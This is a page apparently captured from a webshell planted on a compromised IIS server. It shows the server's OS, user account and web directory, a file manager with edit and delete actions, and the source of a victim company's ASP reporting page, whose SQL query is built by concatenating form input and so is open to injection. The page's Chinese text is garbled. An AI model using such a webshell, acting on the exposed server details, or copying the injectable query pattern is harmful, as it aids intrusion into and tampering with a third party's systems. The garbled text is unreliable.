Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Response.Charset="gb2312"%> <!--#include file="include/conn.asp" --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="robots" content="noindex,nofollow"> <script type="text/javascript" src="js/echarts.min.js" charset="utf-8"></script> <script type="text/javascript" src="http://code.jquery.com/jquery-1.12.2.js"></script> <title>ASC���ʹ�˾</title> <style> table{ border: solid 1px #000000; } table tr td{ border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; border-left-width:1px; border-left-color:#000000; } .box{ border-left-width:3px; border-left-color:#FF0000; border-Bottom: dotted 1px #000000; border-top: dotted 1px #000000; border-right: dotted 1px #000000; } </style> </head> <body style="text-align:center; margin:0 auto;"> <% flgRead = Request.Querystring("arg") if flgRead <> "Asc365NewSys" then response.end fromdate = "2020-01-01" fromdate = DateAdd("m",-1,date()) todate = DateAdd("d",-1,date()) fgs = "" if request.Form("submit")="submit" then fromdate = request.Form("fromdate") todate = request.Form("todate") fgs = request.Form("fgs") end if dt1 = fromdate dt2 = todate %> <form method="post" action="" align="center" name="prdmsg"> <table width="800" border="1" style="border-collapse: collapse" align="center"> <tr> <td nowrap>���ڴӣ�<input type="text" name="fromdate" value="<%=fromdate%>"></td> <td nowrap>����<input type="text" name="todate" value="<%=todate%>"></td> <td nowrap>�ֹ�˾�� <select name="fgs"> <option value="" <%if fgs="" then %> selected <%end if%>>ALL</option> <option value="ͨ�ع�˾" <%if fgs="ͨ�ع�˾" then %> selected <%end if%>>ͨ�ع�˾</option> <option value="��ѷ��˾" <%if fgs="��ѷ��˾" then %> selected <%end if%>>��ѷ��˾</option> <option value="�������" <%if fgs="�������" then %> selected <%end if%>>�������</option> </select> </td> <td nowrap><input type="submit" name="submit" value="submit"></td> </tr> <tr> <td colspan=4> ��ʼʱ��δ�����������ʼ����ǰһ����û�и���Ķ�����</br> ������ɱ���������ﵽ�������������ͺ�ͬ���ȡ���ֵ���������һ�θ����¼Ϊ���Dz��ָ������2023-02-18 Frank�� </td> </tr> </table> </form> <% sql = "Exec GetDaifukuanJine '" & dt1 & "','" & dt2 & "','" & fgs & "'" datedt = "[" cgfk = "[" set rs = server.CreateObject("adodb.recordset") rs.open sql,conn,1,1 do while not rs.eof datedt = datedt & "'" & rs(0) & "'," cgfk=cgfk & rs(1) & "," rs.movenext loop datedt = left(datedt,len(datedt) -1) & "]" cgfk=left(cgfk,len(cgfk)-1) & "]" rs.close set rs = nothing conn.close set conn = nothing %> <div id="container" style="text-align:center; height:85%" >Loading...</div> </div> </body> </html> <script type="text/javascript"> var mydd = [<%=cgfk%>]; var dataX = <%=datedt%>; var dom = document.getElementById("container"); var myChart = echarts.init(dom); var app = {}; option = null; option = { title: { text: '��������ͳ��', left:'center' }, tooltip: { trigger: 'axis' }, legend: { data:["��������"], selected:{"��������":true}, left:'center', top: '50' }, grid: { top: '100', left: '3%', right: '4%', bottom: '5%', containLabel: true }, toolbox: { feature: { dataView : {show: true, readOnly: false,title:'�鿴����'}, saveAsImage: { title: '����ΪͼƬ' } } }, xAxis: { name: '����', type: 'category', boundaryGap: false, data: dataX }, yAxis: [ { name: '��', type: 'value', scale:'true', nameTextStyle:{ fontSize:'15' } } ], dataZoom:[{ startValue: dataX[0] },{ type: 'inside' }], series: [ { name: '��������', type:'line', yAxisIndex: 0, data: mydd[0] } ] }; ; if (option && typeof option === "object") { myChart.setOption(option, true); } </script>